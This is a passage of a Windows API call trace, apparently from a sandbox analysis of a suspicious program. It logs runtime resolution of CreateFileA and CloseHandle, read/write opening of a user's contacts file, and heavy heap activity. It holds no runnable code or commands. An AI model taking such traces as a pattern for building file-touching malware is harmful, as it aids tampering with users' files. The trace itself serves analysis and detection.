dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0074.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76abe0 [0074.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76abe0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.892] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abe0 [0074.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76abe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0074.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.893] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0074.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0074.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0074.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0074.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3d) returned 0x74b420 [0074.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", cchWideChar=61, lpMultiByteStr=0x74b420, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpUsedDefaultChar=0x0) returned 61 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.894] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0074.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a0b20 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7a) returned 0x6969c0 [0074.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=61, lpWideCharStr=0x6969c0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 61 [0074.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0074.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0074.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0074.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0074.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0074.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.897] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0074.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.899] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0074.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0074.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0074.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0074.900] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0074.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0074.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.901] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0074.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.901] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76af88 [0074.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76af88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0074.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.902] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0074.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0074.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0074.902] CloseHandle (hObject=0x128) returned 1 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a0d40 [0074.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0074.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0074.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 